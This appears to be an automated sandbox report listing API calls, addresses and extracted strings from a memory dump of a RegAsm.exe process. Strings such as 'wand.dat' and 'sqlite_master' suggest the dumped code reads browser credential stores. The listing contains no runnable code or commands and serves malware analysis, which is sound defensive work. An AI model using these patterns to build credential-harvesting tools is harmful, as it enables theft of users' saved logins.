                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3384217055-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1889144086-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1661045500-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                Strings
                                                                                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$free
                                                                                                                                                                                • String ID: g4@
                                                                                                                                                                                • API String ID: 2888793982-2133833424
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: sqlite_master
                                                                                                                                                                                • API String ID: 438689982-3163232059
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3917621476-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                • free.MSVCRT ref: 0041747F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2678498856-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3888421826-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3727323765-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$CloseHandle
                                                                                                                                                                                • String ID: General
                                                                                                                                                                                • API String ID: 3722638380-26480598
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 979780441-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1386444988-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                • String ID: d=E
                                                                                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                                                                                • String ID: "
                                                                                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                • String ID: URL
                                                                                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                                                                                APIs
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                                • String ID: F^@
                                                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                                                • String ID: WinPos
                                                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
